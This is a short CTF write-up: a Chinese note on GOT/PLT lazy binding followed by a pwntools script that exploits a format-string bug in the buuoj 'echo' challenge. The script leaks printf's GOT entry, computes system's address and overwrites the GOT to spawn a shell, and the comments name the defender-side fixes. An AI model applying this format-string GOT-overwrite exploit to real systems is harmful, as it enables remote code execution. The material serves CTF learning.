格式化字符串，跟以前差不多。如果说刚开始就去泄露 system 的 got，其实是不对的：那个时候 system 还没有被调用过，延迟绑定尚未完成，got 表里存的还不是 libc 中的真实地址，所以泄露出来的值是错误的。这里就涉及到 got 表与 plt 表的知识了，应该以前也学过，问题不大。
"""Exploit script for the CTF ``echo`` challenge (remote instance on buuoj).

Flow, as written below: one format-string read leaks printf's resolved
address out of the GOT, that leak is converted into system's address via
the symbol offsets of the supplied libc, and a second format-string write
redirects printf's GOT entry to system so the next input line is run as a
shell command.

NOTE(review): the GOT overwrite can only succeed because the target's GOT
is writable (no Full RELRO, i.e. not linked with ``-Wl,-z,relro,-z,now``)
and because user input reaches printf as the format string
(``-Wformat -Werror=format-security`` makes the compiler reject that
pattern). Those two settings are the defender-side fix.
"""
from pwn import*
from LibcSearcher import*
# Log every byte sent and received; helps when the argument offset is wrong.
context.log_level = 'debug'
# libc shipped with the challenge; only its symbol offsets are used below.
libc = ELF('libc-2.232.so')
#io = process('./echo')
io = remote("node4.buuoj.cn",28828)
elf =ELF('./echo')
def debug():
    # Attach gdb to the running target and block until the user continues.
    gdb.attach(io)
    pause()
# GOT slot of printf: read first (the leak), overwritten later (the hijack).
printf_got = elf.got['printf']
# Unused below.
system_got = elf.got['system']
# The GOT address is placed at the start of the buffer; ``%7$s`` then treats
# the 7th positional argument -- presumably where the buffer lands on the
# stack -- as a char* and prints the bytes stored there up to a NUL, i.e.
# the resolved 4-byte printf address.
# NOTE(review): written for Python 2 pwntools; under Python 3 ``p32`` returns
# bytes and concatenating it with a str raises TypeError.
payload = p32(printf_got)+"%7$s"
io.sendline(payload)
# Read up to the 0xf7 byte and take the last 4 bytes as the little-endian
# address. This assumes the high byte of the leaked 32-bit libc address is
# 0xf7 -- fragile if the mapping differs.
printf_addr = u32(io.recvuntil('\xf7')[-4:])
#libc= LibcSearcher('printf',printf_addr)
# leak - offset(printf) + offset(system): both symbols share one libc base.
system_addr = printf_addr-libc.sym['printf']+libc.sym['system']
#system_addr = u32(io.recvuntil('\xf7')[-4:])+0x22860
print("system:"+hex(system_addr))
# pwntools builds a format-string write, for argument offset 7, that stores
# system_addr into printf's GOT entry.
payload =fmtstr_payload(7,{printf_got: system_addr})
io.sendline(payload)
#debug()
# From here on the binary's printf(buf) call lands in system(buf).
io.sendline("/bin/sh\x00")
io.interactive()
